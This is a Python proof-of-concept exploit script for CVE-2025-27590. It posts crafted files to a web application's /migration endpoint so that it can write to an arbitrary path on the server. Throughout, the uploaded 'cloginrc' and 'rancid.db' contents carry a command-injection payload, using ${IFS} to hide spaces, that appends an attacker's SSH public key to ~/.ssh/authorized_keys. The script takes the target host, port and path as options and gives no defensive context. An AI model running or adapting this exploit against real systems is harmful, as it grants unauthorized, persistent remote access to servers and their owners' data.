import requests
import argparse

def exploit(target_url, port, path_to_write):
    url = f"http://{target_url}:{port}/migration"

    ssh_payload = (
        'add user echo${IFS}"ecdsa-sha2-nistp256"${IFS}"'
        'AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNT1PSnpzRedgI3hlJM18skyWwhtXN72KCTYmYNHv+2SWubbU8WBYD7j4k6QQQenbf2WbjQsirc7+x/Q6Wjt9bY="'
        '>>~/.ssh/authorized_keys;# '
    )

    files = {
        "cloginrc": ("cloginrc", ssh_payload, "application/octet-stream"),
        "file1": (
            "rancid.db",
            'echo${IFS}"ecdsa-sha2-nistp256"${IFS}"AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNT1PSnpzRedgI3hlJM18skyWwhtXN72KCTYmYNHv+2SWubbU8WBYD7j4k6QQQenbf2WbjQsirc7+x/Q6Wjt9bY=">>~/.ssh/authorized_keys;#:cisco:up',
            "application/octet-stream"
        )
    }

    data = {
        "path_new_file": path_to_write,
        "group1": "default"
    }

    headers = {
        "User-Agent": "Mozilla/5.0",
        "Origin": f"http://{target_url}:{port}",
        "Referer": f"http://{target_url}:{port}/migration"
    }

    print(f"[+] Sending exploit to {url}...")
    response = requests.post(url, data=data, files=files, headers=headers)

    print(f"[+] Status Code: {response.status_code}")
    print(f"[+] Response:\n{response.text}")

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2025-27590 PoC Exploit")
    parser.add_argument("-u", "--url", required=True, help="Target IP or domain")
    parser.add_argument("-p", "--port", required=True, type=int, help="Port number")
    parser.add_argument("-l", "--location", required=True, help="Target path to write to (e.g., /home/user/.bashrc)")

    args = parser.parse_args()
    exploit(args.url, args.port, args.location)